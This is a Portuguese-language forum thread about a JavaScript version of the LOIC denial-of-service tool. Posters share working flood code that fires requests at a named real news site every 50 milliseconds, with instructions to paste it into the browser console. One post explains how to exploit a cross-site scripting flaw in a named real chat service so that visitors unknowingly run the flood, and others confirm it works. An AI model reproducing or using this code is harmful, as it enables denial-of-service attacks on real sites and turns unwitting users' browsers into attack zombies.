Tweet
como faço para usar isso ?
-
-
Muito bom, agora se funciona eu não sei eu ja usei outros hospedados e achei q não fazia diferença alguma quando eu atacava =/ mais tbem minha net é só de 1mb
Comment
-
Usar sozinho, no próprio PC, é o mesmo que abrir o próprio Loic binário e (tentar) atacar.
Ele não usa o poder do servidor, e sim do usuário. Porém, com algumas modificações, é possível fazer com que o usuário ataque o alvo sem que esteja ciente, somente ao visitar a página.Este material pode ser compartilhado, desde que os devidos créditos sejam dados.
Notify-list · Twitter · Blog
Nova lei: Invadir computadores protegidos é crime.
Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)Comment
-
Bom estive analisando o código e confirmo que ele não funciona
pois é só visual e não possui poder nenhum
podem testar cliquem em começar ataque sem nenhuma url definida
a contagem vai começar do mesmo jeitoComment
-
Manja JavaScript mesmo, amigo?Bom estive analisando o código e confirmo que ele não funciona
pois é só visual e não possui poder nenhum
podem testar cliquem em começar ataque sem nenhuma url definida
a contagem vai começar do mesmo jeito
Eu confirmo que funciona sim. Duvida?Código HTML:var rID =Number(new Date()); var img = new Image(); img.onerror = function () { onFail(rID); }; img.onabort = function () { onFail(rID); }; img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
=]Este material pode ser compartilhado, desde que os devidos créditos sejam dados.
Notify-list · Twitter · Blog
Nova lei: Invadir computadores protegidos é crime.
Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)Comment
-
Se alguém quiser um formato compacto e ter noção de como isso poderia ser usado no XSS, aqui vai uma versão compacta:
O que ele faz basicamente é rodar uma função infinitas vezes, e cada vez que roda, ele cria um img e atribui o atributo src desse img como o site alvo.Código:function f_(t_) {var r_=Number(new Date());var img = new Image();img.setAttribute("src",t_+"?d="+r_);};setInterval("f_('http://www.uol.com.br/favicon.ico')",50);
pra usar é so colar isso no console do Chrome, no exemplo ele flooda o uol, pegando o icone do uol, a um tempo de 50 milisegundos.
Acredito que a cada nova requisição do sistema, o servidor precisa criar novas estruturas e tal, portanto EU ACHO, intuitivamente que é mais interessante para o atacante que as mensagens de entrega do servidor sejam curtas e que a ocupação com o servidor seja mais em receber mais entradas (pra criar mais chamadas de sistema e etc), mas isso é so uma intuição. Exatamente por isso que acredito que seja mais inteligente pegar a menor imagem possível do servidor, ou seja, pega o ícone favicon.ico que todo servidor geralmente tem.
Um sistema que pode ser usado para usar esse LOIC é o Chat do T3rra, uma sala cheia do Chat do t3rra tem 50 pessoas.
Existe uma vulnerabilidade do chat do t3rra que permite você enviar esse LOIC.
nesse arquivo do t3rra acima, existe uma linha assimCódigo:http://s1.trrsf.com.br/chat_client_stf/prod/_js/chatClient_compressed.js
valMessage = font + _strEscape(initialText + " " + valMessage + " " + finalText) + fontClose;
Basta que você retire o _strEscape, ficando assim:
valMessage = font + (initialText + " " + valMessage + " " + finalText) + fontClose;
e pronto, você pode injetar o LOIC em várias salas e fazer os usuarios de zumbis.
Portanto bastaria que alguém injetasse assim:
nas salas (considerando que você ja tenha modificado seu chatClient_compressed.js)Código:<script>function f_(t_) {var r_=Number(new Date());var img = new Image();img.setAttribute("src",t_+"?d="+r_);};setInterval("f_('http://www.uol.com.br/favicon.ico')",50);</script>
Escrevi isso para mostrar como que o XSS pode ser usado em conjunto com o LOIC para derrubar sistemas, espero que seja útil.
Comment
-
Legal Okal,testado e aprovado cara.Vc é demais.Comment
-
Alguém já testou sabe se funciona!!Comment
-
Vlw parece funcionarComment
-
O código faz várias requisições ajax ao servidor, não é? Fazendo o servidor - no momento em que as requisições ultrapassarem sua capacidade de processamento - "cair".
Obrigado por compartilhar.
You say yes, I say no
You say stop but I say go, go, go
You say goodbye and I say hello
Comment
-
mto bom veyyComment
-
muito legal,mas quantos pacotes seria necessario para derrubar um site fraco ou quantos kbts ou giga ou mb seria necessario?
sigpic
Cedo ou tarde, você vai aprender, assim como eu aprendi, que existe uma diferença entre CONHECER o caminho e TRILHAR o caminho.Comment
Comment